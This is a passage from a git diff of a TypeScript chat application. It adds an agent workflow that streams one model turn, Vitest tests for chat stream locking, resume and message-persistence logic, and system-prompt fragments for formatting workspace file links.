`start(runAgentWorkflow, [...])` and pipes `run.getReadable()` back to the + * client; this function writes UIMessage chunks into the workflow's writable + * via `runAgentStep`. + * + * Currently runs a SINGLE `runAgentStep` turn. A multi-turn agent loop is + * unsafe today: each iteration would re-send the original prompt without + * the assistant's tool-call response in scope, so a `tool-calls` finish + * reason would loop forever on the same input. 
The proper multi-turn + * shape (where the step appends its response to `messages` before the + * next iteration) lands with the sandbox-tool port in PR 4. + * + * Until then, if the model returns `tool-calls` we log a warning and exit + * — the client receives the partial tool-call chunks but no follow-up turn. + * + * WDK constraints honored: + * - All I/O (streamText, fetches) lives in `"use step"` functions. + * - The workflow body only orchestrates — no fetch / setTimeout / fs / crypto. + */ +export async function runAgentWorkflow(input: RunAgentWorkflowInput): Promise<void> { + "use workflow"; + + console.log("[runAgentWorkflow] start", { + chatId: input.chatId, + sessionId: input.sessionId, + modelId: input.modelId, + }); + + const writable = getWritable<UIMessageChunk>(); + const result = await runAgentStep({ + messages: input.messages, + modelId: input.modelId, + writable, + }); + + if (result.finishReason === "tool-calls") { + console.warn( + "[runAgentWorkflow] model returned tool-calls but tool execution is not wired yet; exiting after 1 turn", + { chatId: input.chatId }, + ); + } else { + console.log("[runAgentWorkflow] finish", { finishReason: result.finishReason }); + } +} diff --git a/lib/chat/__tests__/compareAndSetChatActiveStreamId.test.ts b/lib/chat/__tests__/compareAndSetChatActiveStreamId.test.ts new file mode 100644 index 000000000..af22bd363 --- /dev/null +++ b/lib/chat/__tests__/compareAndSetChatActiveStreamId.test.ts @@ -0,0 +1,51 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { compareAndSetChatActiveStreamId } from "@/lib/chat/compareAndSetChatActiveStreamId"; +import { updateChat } from "@/lib/supabase/chats/updateChat"; + +vi.mock("@/lib/supabase/chats/updateChat", () => ({ + updateChat: vi.fn(), +})); + +beforeEach(() => vi.clearAllMocks()); + +describe("compareAndSetChatActiveStreamId", () => { + it("returns ok:true claimed:true when the row predicate matches and is updated", async () => { + 
vi.mocked(updateChat).mockResolvedValue({ ok: true, rowsUpdated: 1, row: null }); + const result = await compareAndSetChatActiveStreamId("chat-1", null, "wrun_x"); + expect(result).toEqual({ ok: true, claimed: true }); + expect(updateChat).toHaveBeenCalledWith( + { id: "chat-1", where: { active_stream_id: null } }, + { active_stream_id: "wrun_x" }, + ); + }); + + it("returns ok:true claimed:false when the predicate matches no rows (race lost)", async () => { + vi.mocked(updateChat).mockResolvedValue({ ok: true, rowsUpdated: 0, row: null }); + const result = await compareAndSetChatActiveStreamId("chat-1", null, "wrun_x"); + expect(result).toEqual({ ok: true, claimed: false }); + }); + + it("returns ok:false with the underlying error on DB failure (distinct from race lost)", async () => { + vi.mocked(updateChat).mockResolvedValue({ ok: false, error: "down" }); + const result = await compareAndSetChatActiveStreamId("chat-1", null, "wrun_x"); + expect(result).toEqual({ ok: false, error: "down" }); + }); + + it("supports expecting a specific run id (placeholder → real promotion)", async () => { + vi.mocked(updateChat).mockResolvedValue({ ok: true, rowsUpdated: 1, row: null }); + await compareAndSetChatActiveStreamId("chat-1", "pending-abc", "wrun_real"); + expect(updateChat).toHaveBeenCalledWith( + { id: "chat-1", where: { active_stream_id: "pending-abc" } }, + { active_stream_id: "wrun_real" }, + ); + }); + + it("supports next=null (releasing the slot)", async () => { + vi.mocked(updateChat).mockResolvedValue({ ok: true, rowsUpdated: 1, row: null }); + await compareAndSetChatActiveStreamId("chat-1", "wrun_old", null); + expect(updateChat).toHaveBeenCalledWith( + { id: "chat-1", where: { active_stream_id: "wrun_old" } }, + { active_stream_id: null }, + ); + }); +}); diff --git a/lib/chat/__tests__/handleChatWorkflowStream.test.ts b/lib/chat/__tests__/handleChatWorkflowStream.test.ts index c61911be8..fb3b434f1 100644 --- 
a/lib/chat/__tests__/handleChatWorkflowStream.test.ts +++ b/lib/chat/__tests__/handleChatWorkflowStream.test.ts @@ -6,22 +6,38 @@ import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow"; import { selectSessions } from "@/lib/supabase/sessions/selectSessions"; import { selectChats } from "@/lib/supabase/chats/selectChats"; import { isSandboxActive } from "@/lib/sandbox/isSandboxActive"; +import { updateSession } from "@/lib/supabase/sessions/updateSession"; +import { compareAndSetChatActiveStreamId } from "@/lib/chat/compareAndSetChatActiveStreamId"; +import { maybeResumeChatStream } from "@/lib/chat/maybeResumeChatStream"; +import { persistLatestUserMessage } from "@/lib/chat/persistLatestUserMessage"; +import { start, getRun } from "workflow/api"; -vi.mock("@/lib/chat/validateChatWorkflow", () => ({ - validateChatWorkflow: vi.fn(), +vi.mock("@/lib/chat/validateChatWorkflow", () => ({ validateChatWorkflow: vi.fn() })); +vi.mock("@/lib/supabase/sessions/selectSessions", () => ({ selectSessions: vi.fn() })); +vi.mock("@/lib/supabase/chats/selectChats", () => ({ selectChats: vi.fn() })); +vi.mock("@/lib/chat/compareAndSetChatActiveStreamId", () => ({ + compareAndSetChatActiveStreamId: vi.fn(), })); -vi.mock("@/lib/supabase/sessions/selectSessions", () => ({ - selectSessions: vi.fn(), +vi.mock("@/lib/sandbox/isSandboxActive", () => ({ isSandboxActive: vi.fn() })); +vi.mock("@/lib/supabase/sessions/updateSession", () => ({ updateSession: vi.fn() })); +vi.mock("@/lib/sandbox/buildActiveLifecycleUpdate", () => ({ + buildActiveLifecycleUpdate: vi.fn(() => ({})), })); -vi.mock("@/lib/supabase/chats/selectChats", () => ({ - selectChats: vi.fn(), +vi.mock("@/lib/chat/maybeResumeChatStream", () => ({ + maybeResumeChatStream: vi.fn(), })); -vi.mock("@/lib/sandbox/isSandboxActive", () => ({ - isSandboxActive: vi.fn(), +vi.mock("@/lib/chat/persistLatestUserMessage", () => ({ + persistLatestUserMessage: vi.fn(), })); +vi.mock("workflow/api", () => ({ + start: 
vi.fn(), + getRun: vi.fn(), +})); +vi.mock("@/app/lib/workflows/runAgentWorkflow", () => ({ runAgentWorkflow: vi.fn() })); vi.mock("@/lib/networking/getCorsHeaders", () => ({ getCorsHeaders: vi.fn(() => ({ "Access-Control-Allow-Origin": "*" })), })); +vi.mock("@/lib/uuid/generateUUID", () => ({ default: vi.fn(() => "deterministic-uuid") })); const ACCOUNT_ID = "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa"; const OTHER_ACCOUNT_ID = "bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb"; @@ -36,130 +52,275 @@ function makeRequest(): NextRequest { }); } -function mockValidatedRequest(overrides: Partial<{ accountId: string }> = {}) { +function mockValidated() { vi.mocked(validateChatWorkflow).mockResolvedValue({ messages: [], chatId: CHAT_ID, sessionId: SESSION_ID, - accountId: overrides.accountId ?? ACCOUNT_ID, + accountId: ACCOUNT_ID, orgId: null, authToken: "test-key", }); } -function mockOwnedSessionWithActiveSandbox() { - mockValidatedRequest(); +function mockSessionOwnedActive(extra: Record = {}) { vi.mocked(selectSessions).mockResolvedValue([ - { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never, + { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true }, ...extra } as never, ]); - vi.mocked(selectChats).mockResolvedValue([{ id: CHAT_ID, session_id: SESSION_ID } as never]); vi.mocked(isSandboxActive).mockReturnValue(true); } -describe("handleChatWorkflowStream (stub)", () => { - beforeEach(() => { - vi.clearAllMocks(); +function mockChatOwned(extra: Record = {}) { + vi.mocked(selectChats).mockResolvedValue([ + { + id: CHAT_ID, + session_id: SESSION_ID, + active_stream_id: null, + model_id: null, + ...extra, + } as never, + ]); +} + +function mockStartedRun(runId = "wrun_test_run_1") { + const stream = new ReadableStream({ + start(controller) { + controller.enqueue({ type: "text-start", id: "a" }); + controller.close(); + }, }); + vi.mocked(start).mockResolvedValue({ runId, getReadable: () => stream } as never); + 
vi.mocked(getRun).mockReturnValue({ cancel: vi.fn(() => Promise.resolve()) } as never); + return { runId, stream }; +} + +beforeEach(() => { + vi.clearAllMocks(); + // Default: maybeResumeChatStream returns null (no resume / no active stream) + vi.mocked(maybeResumeChatStream).mockResolvedValue(null); +}); - describe("validation short-circuits", () => { - it("returns the validator's short-circuit response unchanged (e.g. 401)", async () => { - const authError = NextResponse.json( - { status: "error", error: "Unauthorized" }, - { status: 401 }, +describe("handleChatWorkflowStream", () => { + describe("short-circuit responses", () => { + it("passes through the validator's response (401/400)", async () => { + vi.mocked(validateChatWorkflow).mockResolvedValue( + NextResponse.json({ status: "error", error: "Unauthorized" }, { status: 401 }), ); - vi.mocked(validateChatWorkflow).mockResolvedValue(authError); const res = await handleChatWorkflowStream(makeRequest()); expect(res.status).toBe(401); + expect(start).not.toHaveBeenCalled(); }); - it("returns the validator's 400 unchanged (e.g. 
invalid body)", async () => { - const badBody = NextResponse.json( - { status: "error", error: "Invalid JSON body" }, - { status: 400 }, - ); - vi.mocked(validateChatWorkflow).mockResolvedValue(badBody); + it("returns 500 when selectSessions errors", async () => { + mockValidated(); + vi.mocked(selectSessions).mockResolvedValue(null); const res = await handleChatWorkflowStream(makeRequest()); - expect(res.status).toBe(400); + expect(res.status).toBe(500); }); - }); - describe("session / chat ownership", () => { - beforeEach(() => mockValidatedRequest()); - - it("returns 404 when the session does not exist", async () => { + it("returns 404 when session does not exist", async () => { + mockValidated(); vi.mocked(selectSessions).mockResolvedValue([]); const res = await handleChatWorkflowStream(makeRequest()); expect(res.status).toBe(404); }); - it("returns 500 when selectSessions errors (returns null)", async () => { - vi.mocked(selectSessions).mockResolvedValue(null); - const res = await handleChatWorkflowStream(makeRequest()); - expect(res.status).toBe(500); - }); - - it("returns 403 when the session is owned by a different account", async () => { + it("returns 403 when session not owned", async () => { + mockValidated(); vi.mocked(selectSessions).mockResolvedValue([ - { id: SESSION_ID, account_id: OTHER_ACCOUNT_ID, sandbox_state: { ready: true } } as never, + { id: SESSION_ID, account_id: OTHER_ACCOUNT_ID, sandbox_state: {} } as never, ]); const res = await handleChatWorkflowStream(makeRequest()); expect(res.status).toBe(403); }); - it("returns 400 'Sandbox not initialized' when sandbox is inactive", async () => { + it("returns 400 when sandbox is inactive", async () => { + mockValidated(); vi.mocked(selectSessions).mockResolvedValue([ { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: null } as never, ]); vi.mocked(isSandboxActive).mockReturnValue(false); const res = await handleChatWorkflowStream(makeRequest()); expect(res.status).toBe(400); - const body = 
await res.json(); - expect(body.error).toMatch(/sandbox/i); }); - it("returns 404 when the chat does not exist", async () => { - vi.mocked(selectSessions).mockResolvedValue([ - { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never, - ]); - vi.mocked(isSandboxActive).mockReturnValue(true); + it("returns 404 when chat does not exist", async () => { + mockValidated(); + mockSessionOwnedActive(); vi.mocked(selectChats).mockResolvedValue([]); const res = await handleChatWorkflowStream(makeRequest()); expect(res.status).toBe(404); }); + }); - it("returns 404 when chat exists but belongs to a different session", async () => { - vi.mocked(selectSessions).mockResolvedValue([ - { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never, - ]); - vi.mocked(isSandboxActive).mockReturnValue(true); - vi.mocked(selectChats).mockResolvedValue([ - { id: CHAT_ID, session_id: "different-session" } as never, - ]); + describe("resume / conflict via maybeResumeChatStream", () => { + beforeEach(() => { + mockValidated(); + mockSessionOwnedActive(); + mockChatOwned({ active_stream_id: "wrun_existing" }); + }); + + it("returns the resume response when maybeResumeChatStream yields one", async () => { + const resumeResponse = new Response("ok", { + status: 200, + headers: { "x-workflow-run-id": "wrun_existing" }, + }); + vi.mocked(maybeResumeChatStream).mockResolvedValue(resumeResponse); const res = await handleChatWorkflowStream(makeRequest()); - expect(res.status).toBe(404); + expect(res.headers.get("x-workflow-run-id")).toBe("wrun_existing"); + expect(start).not.toHaveBeenCalled(); + }); + + it("returns the conflict response when maybeResumeChatStream yields 409", async () => { + const conflict = NextResponse.json({ status: "error", error: "conflict" }, { status: 409 }); + vi.mocked(maybeResumeChatStream).mockResolvedValue(conflict); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(409); + 
expect(start).not.toHaveBeenCalled(); }); }); - describe("success (stub response)", () => { - beforeEach(() => mockOwnedSessionWithActiveSandbox()); + describe("placeholder CAS before start", () => { + beforeEach(() => { + mockValidated(); + mockSessionOwnedActive(); + mockChatOwned(); + }); + + it("returns 500 when the placeholder-CAS hits a DB error", async () => { + vi.mocked(compareAndSetChatActiveStreamId).mockResolvedValueOnce({ + ok: false, + error: "down", + }); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(500); + expect(start).not.toHaveBeenCalled(); + }); - it("returns 200 with text/event-stream content type", async () => { + it("returns 409 (without calling start) when the placeholder-CAS loses the race", async () => { + vi.mocked(compareAndSetChatActiveStreamId).mockResolvedValueOnce({ + ok: true, + claimed: false, + }); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(409); + expect(start).not.toHaveBeenCalled(); + }); + + it("starts the workflow only after placeholder CAS succeeds", async () => { + // First CAS = placeholder claim, second CAS = promote placeholder → real run id + vi.mocked(compareAndSetChatActiveStreamId) + .mockResolvedValueOnce({ ok: true, claimed: true }) + .mockResolvedValueOnce({ ok: true, claimed: true }); + mockStartedRun(); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(200); + expect(start).toHaveBeenCalled(); + // Confirm CAS-before-start ordering — first CAS pre-claims with expected=null + const firstCallArgs = vi.mocked(compareAndSetChatActiveStreamId).mock.calls[0]; + expect(firstCallArgs?.[0]).toBe(CHAT_ID); + expect(firstCallArgs?.[1]).toBeNull(); + expect(firstCallArgs?.[2]).toMatch(/^pending-/); + }); + }); + + describe("happy path", () => { + beforeEach(() => { + mockValidated(); + mockSessionOwnedActive(); + mockChatOwned(); + vi.mocked(compareAndSetChatActiveStreamId) + .mockResolvedValueOnce({ 
ok: true, claimed: true }) + .mockResolvedValueOnce({ ok: true, claimed: true }); + }); + + it("returns 200 with text/event-stream and x-workflow-run-id", async () => { + const { runId } = mockStartedRun("wrun_abc_123"); const res = await handleChatWorkflowStream(makeRequest()); expect(res.status).toBe(200); expect(res.headers.get("content-type") ?? "").toMatch(/text\/event-stream/); + expect(res.headers.get("x-workflow-run-id")).toBe(runId); + }); + + it("refreshes session lifecycle activity", async () => { + mockStartedRun(); + await handleChatWorkflowStream(makeRequest()); + expect(updateSession).toHaveBeenCalledWith(SESSION_ID, expect.any(Object)); + }); + + it("fire-and-forgets persistLatestUserMessage", async () => { + mockStartedRun(); + await handleChatWorkflowStream(makeRequest()); + expect(persistLatestUserMessage).toHaveBeenCalledWith(CHAT_ID, []); + }); + + it("passes chat.model_id into the workflow when set", async () => { + vi.mocked(selectChats).mockResolvedValue([ + { + id: CHAT_ID, + session_id: SESSION_ID, + active_stream_id: null, + model_id: "anthropic/claude-opus-4.6", + } as never, + ]); + mockStartedRun(); + await handleChatWorkflowStream(makeRequest()); + const startArgs = vi.mocked(start).mock.calls[0]?.[1]?.[0] as { modelId: string }; + expect(startArgs.modelId).toBe("anthropic/claude-opus-4.6"); + }); + + it("falls back to the default model when chat.model_id is null", async () => { + mockStartedRun(); + await handleChatWorkflowStream(makeRequest()); + const startArgs = vi.mocked(start).mock.calls[0]?.[1]?.[0] as { modelId: string }; + expect(startArgs.modelId).toBe("anthropic/claude-haiku-4.5"); + }); + }); + + describe("promote placeholder → run id", () => { + beforeEach(() => { + mockValidated(); + mockSessionOwnedActive(); + mockChatOwned(); }); - it("sets an x-workflow-run-id response header starting with stub-", async () => { + it("awaits cancel() and returns 409 if promote loses", async () => { + 
vi.mocked(compareAndSetChatActiveStreamId) + .mockResolvedValueOnce({ ok: true, claimed: true }) // claim ok + .mockResolvedValueOnce({ ok: true, claimed: false }); // promote raced + const cancel = vi.fn(() => Promise.resolve()); + vi.mocked(start).mockResolvedValue({ + runId: "wrun_lost", + getReadable: () => new ReadableStream(), + } as never); + vi.mocked(getRun).mockReturnValue({ cancel } as never); const res = await handleChatWorkflowStream(makeRequest()); - const runId = res.headers.get("x-workflow-run-id"); - expect(runId).toBeTruthy(); - expect(runId!.startsWith("stub-")).toBe(true); + expect(res.status).toBe(409); + expect(getRun).toHaveBeenCalledWith("wrun_lost"); + expect(cancel).toHaveBeenCalled(); }); - it("emits a stream body that includes the stub assistant text", async () => { + it("still returns 409 if cancel() throws (best-effort)", async () => { + vi.mocked(compareAndSetChatActiveStreamId) + .mockResolvedValueOnce({ ok: true, claimed: true }) + .mockResolvedValueOnce({ ok: true, claimed: false }); + vi.mocked(start).mockResolvedValue({ + runId: "wrun_lost", + getReadable: () => new ReadableStream(), + } as never); + // Wrap rejection in an async IIFE + attach a noop handler so Vitest's + // unhandled-rejection watcher doesn't fire before the SUT awaits. 
+ const cancelRejection = (async () => { + throw new Error("cancel exploded"); + })(); + cancelRejection.catch(() => { + /* SUT will await this and convert to logged catch */ + }); + vi.mocked(getRun).mockReturnValue({ + cancel: vi.fn(() => cancelRejection), + } as never); const res = await handleChatWorkflowStream(makeRequest()); - const text = await res.text(); - expect(text).toContain("Hello from /api/chat/workflow"); + expect(res.status).toBe(409); }); }); }); diff --git a/lib/chat/__tests__/maybeResumeChatStream.test.ts b/lib/chat/__tests__/maybeResumeChatStream.test.ts new file mode 100644 index 000000000..999c29d24 --- /dev/null +++ b/lib/chat/__tests__/maybeResumeChatStream.test.ts @@ -0,0 +1,46 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { maybeResumeChatStream } from "@/lib/chat/maybeResumeChatStream"; +import { reconcileExistingActiveStream } from "@/lib/chat/reconcileExistingActiveStream"; + +vi.mock("@/lib/chat/reconcileExistingActiveStream", () => ({ + reconcileExistingActiveStream: vi.fn(), +})); +vi.mock("@/lib/networking/getCorsHeaders", () => ({ + getCorsHeaders: vi.fn(() => ({ "Access-Control-Allow-Origin": "*" })), +})); + +beforeEach(() => vi.clearAllMocks()); + +describe("maybeResumeChatStream", () => { + it("returns null when there is no active_stream_id", async () => { + const res = await maybeResumeChatStream("chat-1", null); + expect(res).toBeNull(); + expect(reconcileExistingActiveStream).not.toHaveBeenCalled(); + }); + + it("returns null when reconcile says action=ready", async () => { + vi.mocked(reconcileExistingActiveStream).mockResolvedValue({ action: "ready" }); + const res = await maybeResumeChatStream("chat-1", "wrun_dead"); + expect(res).toBeNull(); + }); + + it("returns a 200 SSE response with x-workflow-run-id on resume", async () => { + const stream = new ReadableStream(); + vi.mocked(reconcileExistingActiveStream).mockResolvedValue({ + action: "resume", + runId: "wrun_live", + stream, + }); + 
const res = await maybeResumeChatStream("chat-1", "wrun_live"); + expect(res).not.toBeNull(); + expect(res!.status).toBe(200); + expect(res!.headers.get("x-workflow-run-id")).toBe("wrun_live"); + expect(res!.headers.get("content-type") ?? "").toMatch(/text\/event-stream/); + }); + + it("returns a 409 on conflict", async () => { + vi.mocked(reconcileExistingActiveStream).mockResolvedValue({ action: "conflict" }); + const res = await maybeResumeChatStream("chat-1", "wrun_x"); + expect(res!.status).toBe(409); + }); +}); diff --git a/lib/chat/__tests__/persistLatestUserMessage.test.ts b/lib/chat/__tests__/persistLatestUserMessage.test.ts new file mode 100644 index 000000000..28d4f7650 --- /dev/null +++ b/lib/chat/__tests__/persistLatestUserMessage.test.ts @@ -0,0 +1,129 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { persistLatestUserMessage } from "@/lib/chat/persistLatestUserMessage"; + +import { upsertChatMessage } from "@/lib/supabase/chat_messages/upsertChatMessage"; +import { selectChatMessages } from "@/lib/supabase/chat_messages/selectChatMessages"; +import { updateChat } from "@/lib/supabase/chats/updateChat"; + +vi.mock("@/lib/supabase/chat_messages/upsertChatMessage", () => ({ + upsertChatMessage: vi.fn(), +})); +vi.mock("@/lib/supabase/chat_messages/selectChatMessages", () => ({ + selectChatMessages: vi.fn(), +})); +vi.mock("@/lib/supabase/chats/updateChat", () => ({ + updateChat: vi.fn(), +})); + +const CHAT_ID = "chat-1"; +const MSG_ID = "msg-1"; + +function userMessage(text = "hello world", id = MSG_ID) { + return { id, role: "user" as const, parts: [{ type: "text" as const, text }] }; +} + +beforeEach(() => { + vi.clearAllMocks(); +}); + +describe("persistLatestUserMessage", () => { + it("no-ops when the last message is not a user message", async () => { + await persistLatestUserMessage(CHAT_ID, [{ id: "a", role: "assistant", parts: [] } as never]); + expect(upsertChatMessage).not.toHaveBeenCalled(); + 
expect(updateChat).not.toHaveBeenCalled(); + }); + + it("no-ops when messages array is empty", async () => { + await persistLatestUserMessage(CHAT_ID, []); + expect(upsertChatMessage).not.toHaveBeenCalled(); + }); + + it("bails on DB error (upsert ok:false) without touching the chat", async () => { + vi.mocked(upsertChatMessage).mockResolvedValue({ ok: false, error: "down" }); + await persistLatestUserMessage(CHAT_ID, [userMessage()]); + expect(updateChat).not.toHaveBeenCalled(); + }); + + it("bails on duplicate (already persisted) without touching the chat", async () => { + vi.mocked(upsertChatMessage).mockResolvedValue({ ok: true, row: null, isDuplicate: true }); + await persistLatestUserMessage(CHAT_ID, [userMessage()]); + expect(updateChat).not.toHaveBeenCalled(); + }); + + it("touches updated_at after a new insert", async () => { + vi.mocked(upsertChatMessage).mockResolvedValue({ + ok: true, + row: { id: MSG_ID } as never, + isDuplicate: false, + }); + vi.mocked(selectChatMessages).mockResolvedValue([{ id: "different-msg" } as never]); + await persistLatestUserMessage(CHAT_ID, [userMessage()]); + const firstCall = vi.mocked(updateChat).mock.calls[0]; + expect(firstCall?.[0]).toEqual({ id: CHAT_ID }); + expect(firstCall?.[1]).toMatchObject({ updated_at: expect.any(String) }); + }); + + it("sets chat.title when the inserted message is the earliest", async () => { + vi.mocked(upsertChatMessage).mockResolvedValue({ + ok: true, + row: { id: MSG_ID } as never, + isDuplicate: false, + }); + vi.mocked(selectChatMessages).mockResolvedValue([{ id: MSG_ID } as never]); + await persistLatestUserMessage(CHAT_ID, [userMessage("Hello there from a test")]); + const titleCall = vi + .mocked(updateChat) + .mock.calls.find(c => (c[1] as { title?: string }).title !== undefined); + expect(titleCall?.[1]).toEqual({ title: "Hello there from a test" }); + }); + + it("skips title when the inserted message is no longer the earliest", async () => { + 
vi.mocked(upsertChatMessage).mockResolvedValue({ + ok: true, + row: { id: MSG_ID } as never, + isDuplicate: false, + }); + vi.mocked(selectChatMessages).mockResolvedValue([{ id: "older-msg" } as never]); + await persistLatestUserMessage(CHAT_ID, [userMessage()]); + const titleCall = vi + .mocked(updateChat) + .mock.calls.find(c => (c[1] as { title?: string }).title !== undefined); + expect(titleCall).toBeUndefined(); + }); + + it("truncates titles to exactly TITLE_MAX_LENGTH including the suffix", async () => { + vi.mocked(upsertChatMessage).mockResolvedValue({ + ok: true, + row: { id: MSG_ID } as never, + isDuplicate: false, + }); + vi.mocked(selectChatMessages).mockResolvedValue([{ id: MSG_ID } as never]); + const long = "x".repeat(120); + await persistLatestUserMessage(CHAT_ID, [userMessage(long)]); + const titleCall = vi + .mocked(updateChat) + .mock.calls.find(c => (c[1] as { title?: string }).title !== undefined); + const title = (titleCall?.[1] as { title: string }).title; + expect(title.length).toBe(80); + expect(title.endsWith("…")).toBe(true); + }); + + it("bails on title-set when selectChatMessages errors (null)", async () => { + vi.mocked(upsertChatMessage).mockResolvedValue({ + ok: true, + row: { id: MSG_ID } as never, + isDuplicate: false, + }); + vi.mocked(selectChatMessages).mockResolvedValue(null); + await persistLatestUserMessage(CHAT_ID, [userMessage()]); + const titleCall = vi + .mocked(updateChat) + .mock.calls.find(c => (c[1] as { title?: string }).title !== undefined); + expect(titleCall).toBeUndefined(); + }); + + it("swallows thrown errors without escaping", async () => { + vi.mocked(upsertChatMessage).mockRejectedValue(new Error("boom")); + await expect(persistLatestUserMessage(CHAT_ID, [userMessage()])).resolves.toBeUndefined(); + }); +}); diff --git a/lib/chat/__tests__/reconcileExistingActiveStream.test.ts b/lib/chat/__tests__/reconcileExistingActiveStream.test.ts new file mode 100644 index 000000000..b40e12ce6 --- /dev/null +++ 
b/lib/chat/__tests__/reconcileExistingActiveStream.test.ts @@ -0,0 +1,92 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { reconcileExistingActiveStream } from "@/lib/chat/reconcileExistingActiveStream"; +import { getRun } from "workflow/api"; +import { compareAndSetChatActiveStreamId } from "@/lib/chat/compareAndSetChatActiveStreamId"; + +vi.mock("workflow/api", () => ({ + getRun: vi.fn(), +})); +vi.mock("@/lib/chat/compareAndSetChatActiveStreamId", () => ({ + compareAndSetChatActiveStreamId: vi.fn(), +})); + +const CHAT_ID = "chat-1"; +const RUN_ID = "wrun_test"; + +beforeEach(() => vi.clearAllMocks()); + +function mockRun(status: string, getReadable: () => ReadableStream = () => new ReadableStream()) { + vi.mocked(getRun).mockReturnValue({ + status: Promise.resolve(status), + getReadable, + } as never); +} + +describe("reconcileExistingActiveStream", () => { + it("returns action=resume when status is 'running'", async () => { + const stream = new ReadableStream(); + mockRun("running", () => stream); + const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID); + expect(result.action).toBe("resume"); + if (result.action !== "resume") return; + expect(result.runId).toBe(RUN_ID); + expect(result.stream).toBe(stream); + }); + + it("returns action=resume when status is 'pending'", async () => { + mockRun("pending"); + const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID); + expect(result.action).toBe("resume"); + }); + + it("returns action=ready after CASing a completed run's stale id to null", async () => { + mockRun("completed"); + vi.mocked(compareAndSetChatActiveStreamId).mockResolvedValue({ ok: true, claimed: true }); + const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID); + expect(result.action).toBe("ready"); + expect(compareAndSetChatActiveStreamId).toHaveBeenCalledWith(CHAT_ID, RUN_ID, null); + }); + + it("returns action=conflict when getRun throws (transient workflow API error)", async () => { 
+ vi.mocked(getRun).mockImplementation(() => { + throw new Error("workflow API unreachable"); + }); + const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID); + expect(result.action).toBe("conflict"); + // Critical: we do NOT clear the stream id on transient error. + expect(compareAndSetChatActiveStreamId).not.toHaveBeenCalled(); + }); + + it("returns action=conflict when status promise rejects", async () => { + // Wrap in a thenable that defers the rejection so Vitest's + // unhandled-rejection watcher doesn't flag it before the code awaits. + const rejection: Promise = (async () => { + throw new Error("status fetch failed"); + })(); + rejection.catch(() => { + /* attach a handler so it's not 'unhandled' before the SUT awaits */ + }); + vi.mocked(getRun).mockReturnValue({ + status: rejection, + getReadable: () => new ReadableStream(), + } as never); + const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID); + expect(result.action).toBe("conflict"); + expect(compareAndSetChatActiveStreamId).not.toHaveBeenCalled(); + }); + + it("returns action=conflict when CAS-clear loses the race (claimed=false)", async () => { + mockRun("completed"); + vi.mocked(compareAndSetChatActiveStreamId).mockResolvedValue({ ok: true, claimed: false }); + const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID); + expect(result.action).toBe("conflict"); + }); + + it("returns action=conflict when CAS-clear hits a DB error (ok:false)", async () => { + mockRun("completed"); + vi.mocked(compareAndSetChatActiveStreamId).mockResolvedValue({ ok: false, error: "down" }); + const result = await reconcileExistingActiveStream(CHAT_ID, RUN_ID); + // P1 fix: a failed re-read after CAS no longer falls through to "ready". 
+ expect(result.action).toBe("conflict"); + }); +}); diff --git a/lib/chat/agentCustomInstructions.ts b/lib/chat/agentCustomInstructions.ts new file mode 100644 index 000000000..0a3191ea7 --- /dev/null +++ b/lib/chat/agentCustomInstructions.ts @@ -0,0 +1,9 @@ +import { assistantFileLinkPrompt } from "@/lib/chat/assistantFileLinks"; +import { recoupApiSkillPrompt } from "@/lib/chat/recoupApiSkillPrompt"; + +/** + * Platform-wide agent instructions appended on every chat-workflow prompt. + * Combines individual prompt fragments here so the route and tests share one + * source of truth instead of re-joining the same strings in each place. + */ +export const agentCustomInstructions = [assistantFileLinkPrompt, recoupApiSkillPrompt].join("\n\n"); diff --git a/lib/chat/assistantFileLinks.ts b/lib/chat/assistantFileLinks.ts new file mode 100644 index 000000000..b5bd9280f --- /dev/null +++ b/lib/chat/assistantFileLinks.ts @@ -0,0 +1,28 @@ +const WORKSPACE_FILE_HREF_PREFIX = "#workspace-file="; + +function normalizeWorkspaceFilePath(filePath: string): string { + return filePath.replaceAll("\\", "/").trim(); +} + +/** + * Build the in-app deep link the chat UI uses to open a workspace file. + * + * @param filePath - Repo-relative file path (e.g. `src/index.ts`). + * @returns Href fragment prefixed with `#workspace-file=`. + */ +export function buildWorkspaceFileHref(filePath: string): string { + return `${WORKSPACE_FILE_HREF_PREFIX}${normalizeWorkspaceFilePath(filePath)}`; +} + +/** + * System prompt fragment telling the assistant how to render workspace + * file paths as clickable links inside chat messages. + */ +export const assistantFileLinkPrompt = [ + "When you mention a workspace file path in assistant text, render it as a markdown link using this exact format:", + `- \`[path/to/file.ts](${buildWorkspaceFileHref("path/to/file.ts")})\``, + "- Use the repo-relative file path as both the visible link text and the path inside the link.", + "- Whole-file links only for now. 
